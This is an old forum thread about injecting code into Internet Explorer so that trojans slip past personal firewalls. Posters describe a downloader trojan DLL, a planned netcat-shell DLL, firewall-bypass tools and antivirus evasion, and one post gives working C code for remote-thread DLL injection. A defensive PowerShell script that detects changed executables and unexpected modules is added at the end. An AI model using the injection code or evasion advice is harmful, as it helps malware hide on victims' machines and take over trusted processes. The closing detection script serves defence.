Full Version: How To Inject An Exe Into Iexplorer.exe
I am wanting to know how you inject your code or exe so the firewall doesn't pop up and ask for net access when it's already accepted for iexplorer.exe, so the app runs through port 80.
Well, you can't inject a .exe as far as I know; you can inject a Dynamic Link Library (.dll) though. You need some way of making iexplorer.exe execute a command so your DLL can take control.
This is very easy to do. See my attached example, which I released to the advanced forum a long time ago. It is only a POC and I am not interested in comments on mistakes in the code, as it is a rough example.
Disclaimer: This is purely for educational purposes and must not be used for illegal activity. I accept no responsibility for what people do with this code.
QUOTE
Basically, there are two parts to this: the injection program, and the trojan DLL which does the downloading (and execution etc. if you want it to).
You will need to change the line:
char dll[]="D:\\c backup\\cpp\\system hooks\\test dll\\Release\\test dll.dll";
to fit in with your local drive structure. Thanks to vnet for his idea of using CreateToolhelp32Snapshot to retrieve the handle of the injected DLL, to unload it at the end. I'm currently working on a netcat shell which lives in a DLL, to inject via this method.
It's very difficult to inject.
Unless you know what you're doing, it's best you practise on a local network or some experimental computer.
tibbar, thanks for the code.
But you won't pass any firewall with injection; those times are over.
ZoneAlarm asks if the DLL should be allowed to access the net.
Hey, you've got to find processes or programs which have access to use the internet; not all iexplorer processes are allowed.
explorer.exe is another good target. Also, you can try actually injecting into the firewall: keep a list of firewall names, find which one exists, then inject into that.
Well, there's a program called zeroadd and it adds bytes to modify...
so you can inject your complete exe code (excluding the header) and modify some bytes in the main code to execute this exe... it even bypasses the firewall since it's a part of the main exe. Have fun and be careful what you do with it...
OK... injection is one way...
but how to delete the injected file? black
Injection is tough and most firewalls simply compare the list of DLLs needed and the list of DLLs actually used. My suggestion is to use FWB, FireWall Bypass, like Optix FWB or Bifrost FWB, which actually drives code into the core of the exe without ruining it at all. This technique requires awesome assembly skills, as the brain of the code that ventures around the memory is very complex, because it must place code somewhere safe and is continually moving from empty segment to empty segment.
QUOTE(cool_one @ Dec 10 2004, 06:14 PM)
Injection is tough and most firewalls simply compare the list of DLLs needed and the list of DLLs actually used. My suggestion is to use FWB, FireWall Bypass, like Optix FWB or Bifrost FWB, which actually drives code into the core of the exe without ruining it at all. This technique requires awesome assembly skills, as the brain of the code that ventures around the memory is very complex, because it must place code somewhere safe and is continually moving from empty segment to empty segment.

It is actually not hard to do this. You can use WriteProcessMemory to write a function into another process's memory space, and then CreateRemoteThread to execute this function. This requires no asm skills, only C programming plus knowledge of the Win32 API. Here is an extract from one of my programs that uses this idea:

CODE
#include <windows.h>
#include <winternl.h>   // UNICODE_STRING, NTSTATUS, NTAPI

// Prototypes of the two ntdll exports the injected function calls through.
typedef VOID     (NTAPI *RTLINITUNICODESTRING)(PUNICODE_STRING, PCWSTR);
typedef NTSTATUS (NTAPI *LDRLOADDLL)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);

// Here's the tricky bit. When we inject the function into the target process it will not have access to any
// functions via imports, since it is not compiled with the process. Instead we must supply function pointers
// to it, which tell it where to look. This relies on the fact that ntdll.dll is loaded at the same address in
// all processes! The pointers and the DLL name are copied into the target together with the code, so the
// function touches nothing in the injector's address space (a pointer to a local array would be meaningless there).
typedef struct {
    RTLINITUNICODESTRING fnRtlInitUnicodeString;
    LDRLOADDLL           fnLdrLoadDll;
    wchar_t              dllName[MAX_PATH];
} INJECT_PARAMS;

static DWORD WINAPI InjectedDllLoader(INJECT_PARAMS* p)
{
    // Stack only: no malloc/wcslen/delete, those would resolve through imports that do not exist in the target.
    UNICODE_STRING name;
    HANDLE hDll = NULL;
    p->fnRtlInitUnicodeString(&name, p->dllName);
    return (DWORD)p->fnLdrLoadDll(NULL, 0, &name, &hDll);
}
// Marker used to measure the loader; needs /INCREMENTAL:NO and no function reordering so the two stay adjacent.
static void InjectedDllLoaderEnd(void) {}

....
HMODULE ntdll = GetModuleHandleA("ntdll.dll");
INJECT_PARAMS params;
params.fnRtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress(ntdll, "RtlInitUnicodeString");
params.fnLdrLoadDll = (LDRLOADDLL)GetProcAddress(ntdll, "LdrLoadDll"); // the extract used a saved g_OriginalLdrLoadDll here
lstrcpynW(params.dllName, L"Secure API Library.dll", MAX_PATH);

SIZE_T functionSize = (SIZE_T)((BYTE*)InjectedDllLoaderEnd - (BYTE*)InjectedDllLoader);
SIZE_T numBytesWritten = 0;
// One allocation in the target holds the code followed by its parameter block.
BYTE* lpStartAddress = (BYTE*)VirtualAllocEx(targetProcessHandle, NULL, functionSize + sizeof(params),
                                             MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
BYTE* lpParams = lpStartAddress + functionSize;
BOOL didWork = lpStartAddress != NULL
            && WriteProcessMemory(targetProcessHandle, lpStartAddress, (void*)InjectedDllLoader, functionSize, &numBytesWritten)
            && WriteProcessMemory(targetProcessHandle, lpParams, &params, sizeof(params), &numBytesWritten);
DWORD ThreadID = 0;
// The thread parameter is the remote address of the parameter block, not the local struct.
HANDLE hHandle = didWork ? CreateRemoteThread(targetProcessHandle, NULL, 0,
                               (LPTHREAD_START_ROUTINE)lpStartAddress, lpParams, 0, &ThreadID) : NULL;
....

This is using this concept to write the function InjectedDllLoader into the process space of another process, and then uses CreateRemoteThread to execute it.
Search for the DLL injection example I posted some time ago; it's not picked up by anti-virus. You just create a DLL file with your code in it and inject it.
Here are some example injection methods: http://www.codeproject.com/threads/winspy.asp
Uhh, check out http://iamaphex.com, he has released heaps of great shit.
FWB, FWB++, FWB#. And yes, you can inject an entire exe; it isn't that hard, all the hard work has been done.
Exe injection can't bypass a firewall either. Sygate Personal Firewall prompts me if any file has changed and wants to access the internet. Whenever I upgrade my internet software this happens. Even when I patched MSN Messenger with Polygamy it prompted me and showed exactly where the file was changed. I hope most of the other firewalls have this feature as well.
These injection tools work very hard.
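The two checks the posters describe a personal firewall doing (cool_one: compare the DLLs a process should need against the DLLs it has actually loaded; the Sygate post above: prompt again when the approved executable has changed on disk) can be reproduced against a live process with built-in cmdlets. The script below is an added example and is not code from the thread or from any of the posters. It assumes Windows PowerShell 5 or later, that it runs as the user who owns the target process with matching bitness, and it uses placeholders: the process name `iexplore` (the real file name of the Internet Explorer binary that the thread calls iexplorer.exe) and a baseline file under `$env:TEMP`.

```powershell
# Added example (not from the thread): the on-disk and in-memory checks a personal firewall
# applies to an approved process, written with built-in cmdlets.
#   1. Has the executable file changed since it was approved?  (SHA-256 of the file on disk)
#   2. Is a DLL loaded now that was not loaded in the approved run?  (loaded-module list)
# Assumptions: process name and baseline path are placeholders; same user and bitness as the target.
param(
    [string]$ProcessName  = 'iexplore',                  # placeholder target (the IE binary is iexplore.exe)
    [string]$BaselinePath = "$env:TEMP\fw-baseline.json" # placeholder location for the approved snapshot
)

function Get-ProcessSnapshot {
    param([System.Diagnostics.Process]$Process)
    # MainModule/Modules need the same bitness and rights as the target; a protected process throws here.
    $exe = $Process.MainModule.FileName
    [pscustomobject]@{
        Exe     = $exe
        ExeHash = (Get-FileHash -Path $exe -Algorithm SHA256).Hash
        Modules = @($Process.Modules | ForEach-Object { $_.FileName.ToLowerInvariant() } | Sort-Object -Unique)
    }
}

$proc = Get-Process -Name $ProcessName -ErrorAction Stop | Select-Object -First 1
$now  = Get-ProcessSnapshot -Process $proc

if (-not (Test-Path -Path $BaselinePath)) {
    # First run: record what the instance the user approved looks like.
    $now | ConvertTo-Json -Depth 3 | Set-Content -Path $BaselinePath
    Write-Output "Baseline written for $($now.Exe) with $($now.Modules.Count) modules"
    return
}

$base = Get-Content -Path $BaselinePath -Raw | ConvertFrom-Json

# Check 1: has the file on disk changed? Catches a patched or appended exe, misses in-memory injection.
if ($base.ExeHash -ne $now.ExeHash) {
    Write-Warning "$($now.Exe) has changed on disk since it was approved"
}

# Check 2: which modules are loaded now that were not loaded in the approved run? Catches an injected DLL.
$unexpected = @($now.Modules | Where-Object { $base.Modules -notcontains $_ })
foreach ($m in $unexpected) {
    $sig      = Get-AuthenticodeSignature -FilePath $m
    $inSystem = $m.StartsWith($env:SystemRoot.ToLowerInvariant())
    Write-Warning ("unexpected module {0} (signature: {1}; under SystemRoot: {2})" -f $m, $sig.Status, $inSystem)
}
if ($unexpected.Count -eq 0) { Write-Output "No new modules since baseline" }
```

Run it once while the process is in a known-good state to write the baseline, then again after the process has been running for a while. A DLL injected with the CreateRemoteThread method shown earlier in the thread leaves the file hash untouched and shows up only in check 2; a binary patched in place, as the Sygate post describes, trips check 1 before it even runs. Neither check sees code that was written into the process without a module (the "exe injection" the FWB posts talk about), which is why the module list on its own is not a complete answer.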